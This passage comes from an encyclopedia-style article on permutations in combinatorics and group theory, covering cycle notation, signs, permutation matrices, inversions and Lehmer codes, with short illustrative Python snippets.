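sigma = {1: 2, 2: 6, 3: 5, 4: 4, 5: 3, 6: 1}
print(disjoint_cycles(sigma))   # [(1, 2, 6), (3, 5), (4,)]
```

Dropping the 1-cycle (4,) gives exactly the notation (126)(35) used in the text.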
A convenient feature of cycle notation is that inverting the permutation is given by reversing the order of the elements in each cycle. For example,
σ−1=((126)(35))−1=(621)(53).{\displaystyle \sigma ^{-1}={\bigl (}(126)(35){\bigr )}^{-1}=(621)(53).}
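This reversal rule can be verified mechanically. A sketch: build dict permutations from cycle tuples (the helper name `perm_from_cycles` is an assumption) and check that reversing each cycle indeed yields the inverse:

```python
def perm_from_cycles(cycles, support):
    """Build a permutation dict over `support` from disjoint cycles."""
    perm = {x: x for x in support}
    for cycle in cycles:
        # each element maps to the next one in its cycle, wrapping around
        for a, b in zip(cycle, cycle[1:] + cycle[:1]):
            perm[a] = b
    return perm

support = range(1, 7)
sigma = perm_from_cycles([(1, 2, 6), (3, 5)], support)       # (126)(35)
sigma_inv = perm_from_cycles([(6, 2, 1), (5, 3)], support)   # (621)(53)

# Composing the two in either order gives the identity
assert all(sigma_inv[sigma[x]] == x for x in sigma)
assert all(sigma[sigma_inv[x]] == x for x in sigma)
```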
In some combinatorial contexts it is useful to fix a certain order for the elements in the cycles and of the (disjoint) cycles themselves. Miklós Bóna calls the following ordering choices the canonical cycle notation:
For example, (513)(6)(827)(94){\displaystyle (513)(6)(827)(94)} is a permutation of S={1,2,…,9}{\displaystyle S=\{1,2,\ldots ,9\}} in canonical cycle notation.[26]
Richard Stanley calls this the "standard representation" of a permutation,[27] and Martin Aigner uses "standard form".[24] Sergey Kitaev also uses the "standard form" terminology, but reverses both choices; that is, each cycle lists its minimal element first, and the cycles are sorted in decreasing order of their minimal elements.[28]
There are two ways to denote the composition of two permutations. In the most common notation, σ⋅τ{\displaystyle \sigma \cdot \tau } is the function that maps any element x to σ(τ(x)){\displaystyle \sigma (\tau (x))}. The rightmost permutation is applied to the argument first,[29] because the argument is written to the right of the function.
A different rule for multiplying permutations comes from writing the argument to the left of the function, so that the leftmost permutation acts first.[30][31][32] In this notation, the permutation is often written as an exponent, so σ acting on x is written xσ; then the product is defined by xσ⋅τ=(xσ)τ{\displaystyle x^{\sigma \cdot \tau }=(x^{\sigma })^{\tau }}. This article uses the first definition, where the rightmost permutation is applied first.
Thefunction compositionoperation satisfies the axioms of agroup. It isassociative, meaning(ρσ)τ=ρ(στ){\displaystyle (\rho \sigma )\tau =\rho (\sigma \tau )}, and products of more than two permutations are usually written without parentheses. The composition operation also has anidentity element(the identity permutationid{\displaystyle {\text{id}}}), and each permutationσ{\displaystyle \sigma }has an inverseσ−1{\displaystyle \sigma ^{-1}}(itsinverse function) withσ−1σ=σσ−1=id{\displaystyle \sigma ^{-1}\sigma =\sigma \sigma ^{-1}={\text{id}}}.
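The rightmost-first convention and the group axioms can be checked on concrete elements with a small Python sketch (function names are illustrative), using tuples as one-line notation:

```python
def compose(s, t):
    """(s.t)(x) = s(t(x)): the rightmost permutation is applied first."""
    return tuple(s[t[x - 1] - 1] for x in range(1, len(s) + 1))

def inverse(s):
    """Inverse function of a permutation given in one-line notation."""
    inv = [0] * len(s)
    for i, v in enumerate(s, start=1):
        inv[v - 1] = i
    return tuple(inv)

sigma = (2, 1, 3)      # one-line notation: sigma(1)=2, sigma(2)=1, sigma(3)=3
tau = (2, 3, 1)
rho = (3, 1, 2)
identity = (1, 2, 3)

# Associativity, identity, and inverses, checked on concrete elements:
assert compose(compose(rho, sigma), tau) == compose(rho, compose(sigma, tau))
assert compose(sigma, identity) == sigma
assert compose(sigma, inverse(sigma)) == identity
assert compose(inverse(sigma), sigma) == identity
```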
The concept of a permutation as an ordered arrangement admits several generalizations that have been calledpermutations, especially in older literature.
In older literature and elementary textbooks, ak-permutation ofn(sometimes called apartial permutation,sequence without repetition,variation, orarrangement) means an ordered arrangement (list) of ak-element subset of ann-set.[c][33][34]The number of suchk-permutations (k-arrangements) ofn{\displaystyle n}is denoted variously by such symbols asPkn{\displaystyle P_{k}^{n}},nPk{\displaystyle _{n}P_{k}},nPk{\displaystyle ^{n}\!P_{k}},Pn,k{\displaystyle P_{n,k}},P(n,k){\displaystyle P(n,k)}, orAnk{\displaystyle A_{n}^{k}},[35]computed by the formula:[36]
P(n,k)=n⋅(n−1)⋯(n−k+1),{\displaystyle P(n,k)=n\cdot (n-1)\cdots (n-k+1),}
which is 0 when k > n, and otherwise is equal to
n!(n−k)!.{\displaystyle {\frac {n!}{(n-k)!}}.}
The product is well defined without the assumption thatn{\displaystyle n}is a non-negative integer, and is of importance outside combinatorics as well; it is known as thePochhammer symbol(n)k{\displaystyle (n)_{k}}or as thek{\displaystyle k}-th falling factorial powernk_{\displaystyle n^{\underline {k}}}:
P(n,k)=nPk=(n)k=nk_.{\displaystyle P(n,k)={_{n}}P_{k}=(n)_{k}=n^{\underline {k}}.}
This usage of the termpermutationis closely associated with the termcombinationto mean a subset. Ak-combinationof a setSis ak-element subset ofS: the elements of a combination are not ordered. Ordering thek-combinations ofSin all possible ways produces thek-permutations ofS. The number ofk-combinations of ann-set,C(n,k), is therefore related to the number ofk-permutations ofnby:
C(n,k)⋅k!=P(n,k).{\displaystyle C(n,k)\cdot k!=P(n,k).}
These numbers are also known asbinomial coefficients, usually denoted(nk){\displaystyle {\tbinom {n}{k}}}:
C(n,k)=nCk=(nk).{\displaystyle C(n,k)={_{n}}C_{k}={\binom {n}{k}}.}
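These relations can be checked directly with Python's standard math module; a quick sketch:

```python
from math import comb, factorial, perm

n, k = 9, 4
# k-permutations: ordered arrangements of k out of n elements (falling factorial).
assert perm(n, k) == n * (n - 1) * (n - 2) * (n - 3)
assert perm(n, k) == factorial(n) // factorial(n - k)
# Ordering each k-combination in all k! possible ways gives the k-permutations:
assert comb(n, k) * factorial(k) == perm(n, k)
```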
Ordered arrangements ofkelements of a setS, where repetition is allowed, are calledk-tuples. They have sometimes been referred to aspermutations with repetition, although they are not permutations in the usual sense. They are also calledwordsorstringsover the alphabetS. If the setShasnelements, the number ofk-tuples overSisnk.{\displaystyle n^{k}.}
IfMis a finitemultiset, then amultiset permutationis an ordered arrangement of elements ofMin which each element appears a number of times equal exactly to its multiplicity inM. Ananagramof a word having some repeated letters is an example of a multiset permutation.[d]If the multiplicities of the elements ofM(taken in some order) arem1{\displaystyle m_{1}},m2{\displaystyle m_{2}}, ...,ml{\displaystyle m_{l}}and their sum (that is, the size ofM) isn, then the number of multiset permutations ofMis given by themultinomial coefficient,[37]
(nm1,m2,…,ml)=n!m1!m2!⋯ml!.{\displaystyle {\binom {n}{m_{1},m_{2},\ldots ,m_{l}}}={\frac {n!}{m_{1}!\,m_{2}!\cdots m_{l}!}}.}
For example, the number of distinct anagrams of the word MISSISSIPPI is:[38]
11!1!4!4!2!=34650.{\displaystyle {\frac {11!}{1!\,4!\,4!\,2!}}=34650.}
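A short Python sketch (the helper name is illustrative, not a standard-library function) that computes this multinomial coefficient directly from a word's letter multiplicities:

```python
from collections import Counter
from math import factorial

def multiset_permutation_count(word):
    """n! divided by the factorial of each letter's multiplicity (a multinomial coefficient)."""
    count = factorial(len(word))
    for m in Counter(word).values():
        count //= factorial(m)   # each division is exact
    return count

# MISSISSIPPI: 11 letters with multiplicities M:1, I:4, S:4, P:2.
assert multiset_permutation_count("MISSISSIPPI") == 34650
```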
Ak-permutationof a multisetMis a sequence ofkelements ofMin which each element appearsa number of times less than or equal toits multiplicity inM(an element'srepetition number).
Permutations, when considered as arrangements, are sometimes referred to aslinearly orderedarrangements. If, however, the objects are arranged in a circular manner this distinguished ordering is weakened: there is no "first element" in the arrangement, as any element can be considered as the start. An arrangement of distinct objects in a circular manner is called acircular permutation.[39][e]These can be formally defined asequivalence classesof ordinary permutations of these objects, for theequivalence relationgenerated by moving the final element of the linear arrangement to its front.
Two circular permutations are equivalent if one can be rotated into the other. The following four circular permutations on four letters are considered to be the same.
The circular arrangements are to be read counter-clockwise, so the following two are not equivalent since no rotation can bring one to the other.
There are (n– 1)! circular permutations of a set withnelements.
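The count (n − 1)! can be verified by brute force for small n; the sketch below (names are illustrative) groups linear arrangements into rotation-equivalence classes:

```python
from itertools import permutations

def circular_classes(elements):
    """Count equivalence classes of linear arrangements under rotation."""
    seen, classes = set(), 0
    for p in permutations(elements):
        if p in seen:
            continue
        classes += 1
        # All rotations of p belong to the same circular permutation.
        seen |= {p[i:] + p[:i] for i in range(len(p))}
    return classes

# There are (n - 1)! circular permutations of n distinct elements.
assert circular_classes("ABCD") == 6   # (4 - 1)! = 6
```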
The number of permutations ofndistinct objects isn!.
The number ofn-permutations withkdisjoint cycles is the signlessStirling number of the first kind, denotedc(n,k){\displaystyle c(n,k)}or[nk]{\displaystyle [{\begin{smallmatrix}n\\k\end{smallmatrix}}]}.[40]
The cycles (including the fixed points) of a permutationσ{\displaystyle \sigma }of a set withnelements partition that set; so the lengths of these cycles form aninteger partitionofn, which is called thecycle type(or sometimescycle structureorcycle shape) ofσ{\displaystyle \sigma }. There is a "1" in the cycle type for every fixed point ofσ{\displaystyle \sigma }, a "2" for every transposition, and so on. The cycle type ofβ=(125)(34)(68)(7){\displaystyle \beta =(1\,2\,5\,)(\,3\,4\,)(6\,8\,)(\,7\,)}is(3,2,2,1).{\displaystyle (3,2,2,1).}
This may also be written in a more compact form as [1¹2²3¹]{\displaystyle [1^{1}2^{2}3^{1}]}.
More precisely, the general form is[1α12α2⋯nαn]{\displaystyle [1^{\alpha _{1}}2^{\alpha _{2}}\dotsm n^{\alpha _{n}}]}, whereα1,…,αn{\displaystyle \alpha _{1},\ldots ,\alpha _{n}}are the numbers of cycles of respective length. The number of permutations of a given cycle type is[41]
n!1α1α1!2α2α2!⋯nαnαn!.{\displaystyle {\frac {n!}{1^{\alpha _{1}}\alpha _{1}!\,2^{\alpha _{2}}\alpha _{2}!\cdots n^{\alpha _{n}}\alpha _{n}!}}.}
The number of cycle types of a set withnelements equals the value of thepartition functionp(n){\displaystyle p(n)}.
Polya'scycle indexpolynomial is agenerating functionwhich counts permutations by their cycle type.
In general, composing permutations written in cycle notation follows no easily described pattern – the cycles of the composition can be different from those being composed. However the cycle type is preserved in the special case ofconjugatinga permutationσ{\displaystyle \sigma }by another permutationπ{\displaystyle \pi }, which means forming the productπσπ−1{\displaystyle \pi \sigma \pi ^{-1}}. Here,πσπ−1{\displaystyle \pi \sigma \pi ^{-1}}is theconjugateofσ{\displaystyle \sigma }byπ{\displaystyle \pi }and its cycle notation can be obtained by taking the cycle notation forσ{\displaystyle \sigma }and applyingπ{\displaystyle \pi }to all the entries in it.[42]It follows that two permutations are conjugate exactly when they have the same cycle type.
The order of a permutationσ{\displaystyle \sigma }is the smallest positive integermso thatσm=id{\displaystyle \sigma ^{m}=\mathrm {id} }. It is theleast common multipleof the lengths of its cycles. For example, the order ofσ=(152)(34){\displaystyle \sigma =(152)(34)}islcm(3,2)=6{\displaystyle {\text{lcm}}(3,2)=6}.
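A short Python sketch (illustrative names) that extracts the disjoint cycles of a permutation in one-line notation and computes its order as the lcm of the cycle lengths:

```python
from math import lcm

def cycles(perm):
    """Disjoint cycles of a permutation given in one-line notation (1-based)."""
    n, seen, result = len(perm), set(), []
    for start in range(1, n + 1):
        if start in seen:
            continue
        cyc, x = [], start
        while x not in seen:
            seen.add(x)
            cyc.append(x)
            x = perm[x - 1]          # follow the permutation
        result.append(tuple(cyc))
    return result

def order(perm):
    """The order is the least common multiple of the cycle lengths."""
    return lcm(*(len(c) for c in cycles(perm)))

# sigma = (152)(34) in one-line notation: 1->5, 5->2, 2->1, 3->4, 4->3.
sigma = (5, 1, 4, 3, 2)
assert cycles(sigma) == [(1, 5, 2), (3, 4)]
assert order(sigma) == 6             # lcm(3, 2)
```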
Every permutation of a finite set can be expressed as the product of transpositions.[43]Although many such expressions for a given permutation may exist, either they all contain an even number of transpositions or they all contain an odd number of transpositions. Thus all permutations can be classified aseven or odddepending on this number.
This result can be extended so as to assign asign, writtensgnσ{\displaystyle \operatorname {sgn} \sigma }, to each permutation.sgnσ=+1{\displaystyle \operatorname {sgn} \sigma =+1}ifσ{\displaystyle \sigma }is even andsgnσ=−1{\displaystyle \operatorname {sgn} \sigma =-1}ifσ{\displaystyle \sigma }is odd. Then for two permutationsσ{\displaystyle \sigma }andπ{\displaystyle \pi }
sgn(σπ)=sgnσ⋅sgnπ.{\displaystyle \operatorname {sgn}(\sigma \pi )=\operatorname {sgn} \sigma \cdot \operatorname {sgn} \pi .}
It follows thatsgn(σσ−1)=+1.{\displaystyle \operatorname {sgn} \left(\sigma \sigma ^{-1}\right)=+1.}
The sign of a permutation is equal to the determinant of its permutation matrix (below).
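Since a cycle of length l is a product of l − 1 transpositions, the sign can be computed from the number of cycles (fixed points included); a sketch with illustrative names:

```python
def sign(perm):
    """A cycle of length l is a product of l - 1 transpositions,
    so sgn(perm) = (-1) ** (n - number_of_cycles), fixed points counted as cycles."""
    n, seen, num_cycles = len(perm), set(), 0
    for start in range(1, n + 1):
        if start in seen:
            continue
        num_cycles += 1
        x = start
        while x not in seen:
            seen.add(x)
            x = perm[x - 1]
    return -1 if (n - num_cycles) % 2 else 1

assert sign((2, 1, 3)) == -1           # a single transposition is odd
assert sign((2, 3, 1)) == 1            # a 3-cycle is even
assert sign(tuple(range(1, 6))) == 1   # the identity is even
```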
Apermutation matrixis ann×nmatrixthat has exactly one entry 1 in each column and in each row, and all other entries are 0. There are several ways to assign a permutation matrix to a permutation of {1, 2, ...,n}. One natural approach is to defineLσ{\displaystyle L_{\sigma }}to be thelinear transformationofRn{\displaystyle \mathbb {R} ^{n}}which permutes thestandard basis{e1,…,en}{\displaystyle \{\mathbf {e} _{1},\ldots ,\mathbf {e} _{n}\}}byLσ(ej)=eσ(j){\displaystyle L_{\sigma }(\mathbf {e} _{j})=\mathbf {e} _{\sigma (j)}}, and defineMσ{\displaystyle M_{\sigma }}to be its matrix. That is,Mσ{\displaystyle M_{\sigma }}has itsjthcolumn equal to then× 1 column vectoreσ(j){\displaystyle \mathbf {e} _{\sigma (j)}}: its (i,j) entry is 1 ifi=σ(j), and 0 otherwise. Since composition of linear mappings is described by matrix multiplication, it follows that this construction is compatible with composition of permutations:
MσMτ=Mστ{\displaystyle M_{\sigma }M_{\tau }=M_{\sigma \tau }}.
For example, the one-line permutationsσ=213,τ=231{\displaystyle \sigma =213,\ \tau =231}have productστ=132{\displaystyle \sigma \tau =132}, and the corresponding matrices are:MσMτ=(010100001)(001100010)=(100001010)=Mστ.{\displaystyle M_{\sigma }M_{\tau }={\begin{pmatrix}0&1&0\\1&0&0\\0&0&1\end{pmatrix}}{\begin{pmatrix}0&0&1\\1&0&0\\0&1&0\end{pmatrix}}={\begin{pmatrix}1&0&0\\0&0&1\\0&1&0\end{pmatrix}}=M_{\sigma \tau }.}
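The compatibility MσMτ = Mστ can be replayed on this very example in plain Python (illustrative helper names, no matrix library assumed):

```python
def perm_matrix(perm):
    """M_sigma has its j-th column equal to e_{sigma(j)}: entry (i, j) is 1 iff i = sigma(j)."""
    n = len(perm)
    return [[1 if i + 1 == perm[j] else 0 for j in range(n)] for i in range(n)]

def matmul(A, B):
    n = len(A)
    return [[sum(A[i][k] * B[k][j] for k in range(n)) for j in range(n)] for i in range(n)]

sigma, tau = (2, 1, 3), (2, 3, 1)
# Compose with the rightmost permutation applied first: (sigma tau)(x) = sigma(tau(x)).
sigma_tau = tuple(sigma[tau[x] - 1] for x in range(3))   # -> (1, 3, 2), i.e. 132
assert matmul(perm_matrix(sigma), perm_matrix(tau)) == perm_matrix(sigma_tau)
```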
It is also common in the literature to find the inverse convention, where a permutationσis associated to the matrixPσ=(Mσ)−1=(Mσ)T{\displaystyle P_{\sigma }=(M_{\sigma })^{-1}=(M_{\sigma })^{T}}whose (i,j) entry is 1 ifj=σ(i) and is 0 otherwise. In this convention, permutation matrices multiply in the opposite order from permutations, that is,PσPτ=Pτσ{\displaystyle P_{\sigma }P_{\tau }=P_{\tau \sigma }}. In this correspondence, permutation matrices act on the right side of the standard1×n{\displaystyle 1\times n}row vectors(ei)T{\displaystyle ({\bf {e}}_{i})^{T}}:(ei)TPσ=(eσ(i))T{\displaystyle ({\bf {e}}_{i})^{T}P_{\sigma }=({\bf {e}}_{\sigma (i)})^{T}}.
TheCayley tableon the right shows these matrices for permutations of 3 elements.
In some applications, the elements of the set being permuted will be compared with each other. This requires that the setShas atotal orderso that any two elements can be compared. The set {1, 2, ...,n} with the usual ≤ relation is the most frequently used set in these applications.
A number of properties of a permutation are directly related to the total ordering ofS,considering the permutation written in one-line notation as a sequenceσ=σ(1)σ(2)⋯σ(n){\displaystyle \sigma =\sigma (1)\sigma (2)\cdots \sigma (n)}.
Anascentof a permutationσofnis any positioni<nwhere the following value is bigger than the current one. That is,iis an ascent ifσ(i)<σ(i+1){\displaystyle \sigma (i)<\sigma (i{+}1)}. For example, the permutation 3452167 has ascents (at positions) 1, 2, 5, and 6.
Similarly, adescentis a positioni<nwithσ(i)>σ(i+1){\displaystyle \sigma (i)>\sigma (i{+}1)}, so everyiwith1≤i<n{\displaystyle 1\leq i<n}is either an ascent or a descent.
Anascending runof a permutation is a nonempty increasing contiguous subsequence that cannot be extended at either end; it corresponds to a maximal sequence of successive ascents (the latter may be empty: between two successive descents there is still an ascending run of length 1). By contrast anincreasing subsequenceof a permutation is not necessarily contiguous: it is an increasing sequence obtained by omitting some of the values of the one-line notation.
For example, the permutation 2453167 has the ascending runs 245, 3, and 167, while it has an increasing subsequence 2367.
If a permutation hask− 1 descents, then it must be the union ofkascending runs.[44]
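The examples above can be reproduced with a few lines of Python (illustrative names):

```python
def ascents(p):
    """Positions i < n (1-based) with p(i) < p(i+1)."""
    return [i for i in range(1, len(p)) if p[i - 1] < p[i]]

def descents(p):
    return [i for i in range(1, len(p)) if p[i - 1] > p[i]]

def ascending_runs(p):
    """Maximal increasing contiguous subsequences."""
    runs, run = [], [p[0]]
    for prev, cur in zip(p, p[1:]):
        if prev < cur:
            run.append(cur)
        else:
            runs.append(run)
            run = [cur]
    runs.append(run)
    return runs

assert ascents((3, 4, 5, 2, 1, 6, 7)) == [1, 2, 5, 6]
assert ascending_runs((2, 4, 5, 3, 1, 6, 7)) == [[2, 4, 5], [3], [1, 6, 7]]
# k - 1 descents means the permutation splits into k ascending runs:
p = (2, 4, 5, 3, 1, 6, 7)
assert len(ascending_runs(p)) == len(descents(p)) + 1
```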
The number of permutations ofnwithkascents is (by definition) theEulerian number⟨nk⟩{\displaystyle \textstyle \left\langle {n \atop k}\right\rangle }; this is also the number of permutations ofnwithkdescents. Some authors however define the Eulerian number⟨nk⟩{\displaystyle \textstyle \left\langle {n \atop k}\right\rangle }as the number of permutations withkascending runs, which corresponds tok− 1descents.[45]
An exceedance of a permutationσ1σ2...σnis an indexjsuch thatσj>j. If the inequality is not strict (that is,σj≥j), thenjis called aweak exceedance. The number ofn-permutations withkexceedances coincides with the number ofn-permutations withkdescents.[46]
Arecordorleft-to-right maximumof a permutationσis an elementisuch thatσ(j) <σ(i) for allj < i.
Foata'sfundamental bijectiontransforms a permutationσwith a given canonical cycle form into the permutationf(σ)=σ^{\displaystyle f(\sigma )={\hat {\sigma }}}whose one-line notation has the same sequence of elements with parentheses removed.[27][47]For example:σ=(513)(6)(827)(94)=(123456789375916824),{\displaystyle \sigma =(513)(6)(827)(94)={\begin{pmatrix}1&2&3&4&5&6&7&8&9\\3&7&5&9&1&6&8&2&4\end{pmatrix}},}
σ^=513682794=(123456789513682794).{\displaystyle {\hat {\sigma }}=513682794={\begin{pmatrix}1&2&3&4&5&6&7&8&9\\5&1&3&6&8&2&7&9&4\end{pmatrix}}.}
Here the first element in each canonical cycle ofσbecomes a record (left-to-right maximum) ofσ^{\displaystyle {\hat {\sigma }}}. Givenσ^{\displaystyle {\hat {\sigma }}}, one may find its records and insert parentheses to construct the inverse transformationσ=f−1(σ^){\displaystyle \sigma =f^{-1}({\hat {\sigma }})}. Underlining the records in the above example:σ^=5_136_8_279_4{\displaystyle {\hat {\sigma }}={\underline {5}}\,1\,3\,{\underline {6}}\,{\underline {8}}\,2\,7\,{\underline {9}}\,4}, which allows the reconstruction of the cycles ofσ.
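Both directions of Foata's bijection are short to implement; the sketch below (illustrative names) drops the parentheses one way and splits at the records the other way:

```python
def foata(cycles):
    """f: drop the parentheses of the canonical cycle form to get one-line notation."""
    return [x for cyc in cycles for x in cyc]

def foata_inverse(one_line):
    """Split before each left-to-right maximum (record) to recover the canonical cycles."""
    cycles, current, best = [], [], 0
    for x in one_line:
        if x > best:               # x is a new record: it starts a new cycle
            if current:
                cycles.append(tuple(current))
            current, best = [x], x
        else:
            current.append(x)
    cycles.append(tuple(current))
    return cycles

# The example from the text: sigma = (513)(6)(827)(94).
sigma = [(5, 1, 3), (6,), (8, 2, 7), (9, 4)]
assert foata(sigma) == [5, 1, 3, 6, 8, 2, 7, 9, 4]
assert foata_inverse([5, 1, 3, 6, 8, 2, 7, 9, 4]) == sigma
```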
The following table showsσ^{\displaystyle {\hat {\sigma }}}andσfor the six permutations ofS= {1, 2, 3}, with the bold text on each side showing the notation used in the bijection: one-line notation forσ^{\displaystyle {\hat {\sigma }}}and canonical cycle notation forσ.
σ^=f(σ)σ=f−1(σ^)123=(1)(2)(3)123=(1)(2)(3)132=(1)(32)132=(1)(32)213=(21)(3)213=(21)(3)231=(312)321=(2)(31)312=(321)231=(312)321=(2)(31)312=(321){\displaystyle {\begin{array}{l|l}{\hat {\sigma }}=f(\sigma )&\sigma =f^{-1}({\hat {\sigma }})\\\hline \mathbf {123} =(\,1\,)(\,2\,)(\,3\,)&123=\mathbf {(\,1\,)(\,2\,)(\,3\,)} \\\mathbf {132} =(\,1\,)(\,3\,2\,)&132=\mathbf {(\,1\,)(\,3\,2\,)} \\\mathbf {213} =(\,2\,1\,)(\,3\,)&213=\mathbf {(\,2\,1\,)(\,3\,)} \\\mathbf {231} =(\,3\,1\,2\,)&321=\mathbf {(\,2\,)(\,3\,1\,)} \\\mathbf {312} =(\,3\,2\,1\,)&231=\mathbf {(\,3\,1\,2\,)} \\\mathbf {321} =(\,2\,)(\,3\,1\,)&312=\mathbf {(\,3\,2\,1\,)} \end{array}}}As a first corollary, the number ofn-permutations with exactlykrecords is equal to the number ofn-permutations with exactlykcycles: this last number is the signlessStirling number of the first kind,c(n,k){\displaystyle c(n,k)}. Furthermore, Foata's mapping takes ann-permutation withkweak exceedances to ann-permutation withk− 1ascents.[47]For example, (2)(31) = 321 hask =2 weak exceedances (at index 1 and 2), whereasf(321) = 231hask− 1 = 1ascent (at index 1; that is, from 2 to 3).
Aninversionof a permutationσis a pair(i,j)of positions where the entries of a permutation are in the opposite order:i<j{\displaystyle i<j}andσ(i)>σ(j){\displaystyle \sigma (i)>\sigma (j)}.[49]Thus a descent is an inversion at two adjacent positions. For example,σ= 23154has (i,j) = (1, 3), (2, 3), and (4, 5), where (σ(i),σ(j)) = (2, 1), (3, 1), and (5, 4).
Sometimes an inversion is defined as the pair of values (σ(i),σ(j)); this makes no difference for thenumberof inversions, and the reverse pair (σ(j),σ(i)) is an inversion in the above sense for the inverse permutationσ−1.
The number of inversions is an important measure for the degree to which the entries of a permutation are out of order; it is the same forσand forσ−1. To bring a permutation withkinversions into order (that is, transform it into the identity permutation), by successively applying (right-multiplication by)adjacent transpositions, is always possible and requires a sequence ofksuch operations. Moreover, any reasonable choice for the adjacent transpositions will work: it suffices to choose at each step a transposition ofiandi+ 1whereiis a descent of the permutation as modified so far (so that the transposition will remove this particular descent, although it might create other descents). This is so because applying such a transposition reduces the number of inversions by 1; as long as this number is not zero, the permutation is not the identity, so it has at least one descent.Bubble sortandinsertion sortcan be interpreted as particular instances of this procedure to put a sequence into order. Incidentally this procedure proves that any permutationσcan be written as a product of adjacent transpositions; for this one may simply reverse any sequence of such transpositions that transformsσinto the identity. In fact, by enumerating all sequences of adjacent transpositions that would transformσinto the identity, one obtains (after reversal) acompletelist of all expressions of minimal length writingσas a product of adjacent transpositions.
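A sketch (illustrative names) that lists the inversions and sorts by repeatedly swapping at a descent, confirming that exactly k adjacent transpositions are needed:

```python
def inversions(p):
    """Pairs of positions (i, j), 1-based, with i < j and p(i) > p(j)."""
    n = len(p)
    return [(i, j) for i in range(1, n + 1) for j in range(i + 1, n + 1)
            if p[i - 1] > p[j - 1]]

def sort_by_adjacent_swaps(p):
    """Repeatedly swap at a descent; the number of swaps equals the number of inversions."""
    a, swaps = list(p), 0
    while True:
        for i in range(len(a) - 1):
            if a[i] > a[i + 1]:          # i+1 is a descent (1-based)
                a[i], a[i + 1] = a[i + 1], a[i]
                swaps += 1
                break
        else:
            return swaps                 # no descent left: a is sorted

p = (2, 3, 1, 5, 4)   # the example from the text
assert inversions(p) == [(1, 3), (2, 3), (4, 5)]
assert sort_by_adjacent_swaps(p) == len(inversions(p))   # 3 adjacent swaps
```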
The number of permutations ofnwithkinversions is expressed by aMahonian number.[50]This is the coefficient ofqk{\displaystyle q^{k}}in the expansion of the product
[n]q!=∏m=1n∑i=0m−1qi=1(1+q)(1+q+q2)⋯(1+q+q2+⋯+qn−1),{\displaystyle [n]_{q}!=\prod _{m=1}^{n}\sum _{i=0}^{m-1}q^{i}=1\left(1+q\right)\left(1+q+q^{2}\right)\cdots \left(1+q+q^{2}+\cdots +q^{n-1}\right),}
The notation[n]q!{\displaystyle [n]_{q}!}denotes theq-factorial. This expansion commonly appears in the study ofnecklaces.
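The Mahonian numbers can be obtained by expanding this product, and checked against a brute-force inversion count; a Python sketch (illustrative names):

```python
from itertools import permutations

def mahonian(n):
    """Coefficients of [n]_q! = prod_{m=1}^{n} (1 + q + ... + q^{m-1})."""
    coeffs = [1]
    for m in range(1, n + 1):
        new = [0] * (len(coeffs) + m - 1)
        for i, c in enumerate(coeffs):
            for j in range(m):           # multiply by 1 + q + ... + q^{m-1}
                new[i + j] += c
        coeffs = new
    return coeffs

def inv_count(p):
    return sum(p[i] > p[j] for i in range(len(p)) for j in range(i + 1, len(p)))

n = 4
counts = [0] * (n * (n - 1) // 2 + 1)    # inversions range from 0 to n(n-1)/2
for p in permutations(range(n)):
    counts[inv_count(p)] += 1
assert mahonian(n) == counts             # [1, 3, 5, 6, 5, 3, 1]
```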
Letσ∈Sn,i,j∈{1,2,…,n}{\displaystyle \sigma \in S_{n},i,j\in \{1,2,\dots ,n\}}such thati<j{\displaystyle i<j}andσ(i)>σ(j){\displaystyle \sigma (i)>\sigma (j)}.
In this case, say the weight of the inversion(i,j){\displaystyle (i,j)}isσ(i)−σ(j){\displaystyle \sigma (i)-\sigma (j)}.
Kobayashi (2011) proved the enumeration formula∑i<j,σ(i)>σ(j)(σ(i)−σ(j))=|{τ∈Sn∣τ≤σ,τis bigrassmannian}|,{\displaystyle \sum _{i<j,\sigma (i)>\sigma (j)}(\sigma (i)-\sigma (j))=|\{\tau \in S_{n}\mid \tau \leq \sigma ,\tau {\text{ is bigrassmannian}}\}|,}
where≤{\displaystyle \leq }denotesBruhat orderin thesymmetric groups. This graded partial order often appears in the context ofCoxeter groups.
One way to represent permutations ofnthings is by an integerNwith 0 ≤N<n!, provided convenient methods are given to convert between the number and the representation of a permutation as an ordered arrangement (sequence). This gives the most compact representation of arbitrary permutations, and in computing is particularly attractive whennis small enough thatNcan be held in a machine word; for 32-bit words this meansn≤ 12, and for 64-bit words this meansn≤ 20. The conversion can be done via the intermediate form of a sequence of numbersdn,dn−1, ...,d2,d1, wherediis a non-negative integer less thani(one may omitd1, as it is always 0, but its presence makes the subsequent conversion to a permutation easier to describe). The first step then is to simply expressNin thefactorial number system, which is just a particularmixed radixrepresentation, where, for numbers less thann!, the bases (place values or multiplication factors) for successive digits are(n− 1)!,(n− 2)!, ..., 2!, 1!. The second step interprets this sequence as aLehmer codeor (almost equivalently) as an inversion table.
In theLehmer codefor a permutationσ, the numberdnrepresents the choice made for the first termσ1, the numberdn−1represents the choice made for the second termσ2among the remainingn− 1elements of the set, and so forth. More precisely, eachdn+1−igives the number ofremainingelements strictly less than the termσi. Since those remaining elements are bound to turn up as some later termσj, the digitdn+1−icounts theinversions(i,j) involvingias smaller index (the number of valuesjfor whichi<jandσi>σj). Theinversion tableforσis quite similar, but heredn+1−kcounts the number of inversions (i,j) wherek=σjoccurs as the smaller of the two values appearing in inverted order.[51]
Both encodings can be visualized by annbynRothe diagram[52](named afterHeinrich August Rothe) in which dots at (i,σi) mark the entries of the permutation, and a cross at (i,σj) marks the inversion (i,j); by the definition of inversions a cross appears in any square that comes both before the dot (j,σj) in its column, and before the dot (i,σi) in its row. The Lehmer code lists the numbers of crosses in successive rows, while the inversion table lists the numbers of crosses in successive columns; it is just the Lehmer code for the inverse permutation, and vice versa.
To effectively convert a Lehmer codedn,dn−1, ...,d2,d1into a permutation of an ordered setS, one can start with a list of the elements ofSin increasing order, and foriincreasing from 1 tonsetσito the element in the list that is preceded bydn+1−iother ones, and remove that element from the list. To convert an inversion tabledn,dn−1, ...,d2,d1into the corresponding permutation, one can traverse the numbers fromd1todnwhile inserting the elements ofSfrom largest to smallest into an initially empty sequence; at the step using the numberdfrom the inversion table, the element fromSis inserted into the sequence at the point where it is preceded bydelements already present. Alternatively one could process the numbers from the inversion table and the elements ofSboth in the opposite order, starting with a row ofnempty slots, and at each step place the element fromSinto the empty slot that is preceded bydother empty slots.
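The conversion between a permutation and its Lehmer code can be sketched as follows (illustrative names; this is the straightforward quadratic, list-based method):

```python
def lehmer_code(p):
    """d[i] counts later entries smaller than p[i]: the inversions with i as smaller index."""
    n = len(p)
    return [sum(p[j] < p[i] for j in range(i + 1, n)) for i in range(n)]

def from_lehmer(code, items):
    """Rebuild the permutation: at each step pick the element preceded by d remaining ones."""
    pool = sorted(items)
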